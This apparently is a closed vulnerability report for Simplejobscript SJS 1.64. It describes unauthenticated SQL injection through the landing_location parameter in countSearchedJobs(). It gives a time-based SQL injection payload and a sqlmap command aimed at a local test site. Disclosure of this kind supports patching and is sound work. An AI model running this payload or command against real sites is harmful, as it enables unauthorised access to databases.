Closed
Description
Description: An issue was discovered in Simplejobscript.com SJS before 1.65. There is
unauthenticated SQL injection via the search engine. The parameter is landing_location. The function is countSearchedJobs(). The file is _lib/class.Job.php.
Environment:
- Version: 1.64
- OS: Ubuntu 16.10
- Web server: Apache 2.4.18
- PHP: 5.6.40
- Database: MySQL 5.7.28
- URL: /searched
Payload: landing_title=aaa&landing_location=77+or+(select+(sleep(2)))
Steps to Reproduce:
$ sqlmap --threads=10 --batch --dbms=mysql -u "http://local.simplejobscript.net/searched" --data="landing_title=aaa&landing_location=77" -p landing_location --banner
Metadata
Metadata
Assignees
Labels
No labels
